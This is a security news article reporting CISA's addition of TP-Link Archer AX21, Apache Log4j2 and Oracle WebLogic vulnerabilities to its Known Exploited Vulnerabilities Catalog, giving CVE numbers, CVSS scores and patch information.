The Cybersecurity and Infrastructure Security Agency (CISA) has added TP-Link, Apache Log4j2 and Oracle WebLogic vulnerabilities to its Known Exploited Vulnerabilities Catalog.
CISA warned “these types of vulnerabilities are a frequent attack vector for malicious cyber actors and poses a significant risk to the federal enterprise.”
As a result, these vulnerabilities have been added to the Catalog based on evidence of active exploitation.
On May 1, 2023, CISA added TP-Link Archer AX-21 Command Injection Vulnerability (CVE-2023-1389) to the Known Exploited Vulnerabilities Catalog.
Researchers at Tenable discovered an unauthenticated command injection vulnerability in the web management interface of the TP-Link Archer AX21 (AX1800).
TP-Link has released firmware version 1.1.4 Build 20230219 that fixes the issue by removing the vulnerable callback.
This vulnerability has a CVSS score of 8.8.
Apache Log4j2 CVE
In addition, CISA added an Apache Log4j2 Deserialization of Untrusted Data Vulnerability (CVE-2021-45046) to the Catalog of exploited vulnerabilities. The Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations
According to Apache, the previous fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
Researchers first discovered the Critical Apache Log4j vulnerability (CVE-2021-44228) that could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
As a result, the severe issue soon triggered the mad scramble by organizations to quickly patch the severe flaw and put up other blocking mitigations such as web application firewall (WAF) policies.
On December 10, 2021, Apache released a fix in Log4j 2.15.0 for Java 8 users to address CVE-2021-44228 that affected all Log4j versions from 2.0-beta9 to 2.14.1.
This vulnerability has a CVSS score of 9.0.
Oracle WebLogic CVE
Finally, CISA added an Oracle WebLogic Server Unspecified Vulnerability (CVE-2023-21839) to the Catalog. The issue affects Oracle Fusion Middleware (component: Core).
According to NIST, this “easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.”
This vulnerability has a CVSS score of 7.5.
- Apache releases new Log4k security update to fix another RCE vulnerability (CVE-2021-45046)
- CISA Adds MinIO, PaperCut and Google Chrome Vulnerabilities To Known Exploited Vulnerabilities Catalog
- CISA Adds Veritas, Windows and Arm Mali GPU Vulnerabilities To Known Exploited Vulnerabilities Catalog
- CISA Adds IBM and Mitel Vulnerabilities To Known Exploited Vulnerabilities Catalog
- CISA Adds Telerik and Zoho Vulnerabilities To Known Exploited Vulnerabilities Catalog
- CISA adds Critical CWP vulnerability to Known Exploited Vulnerabilities Catalog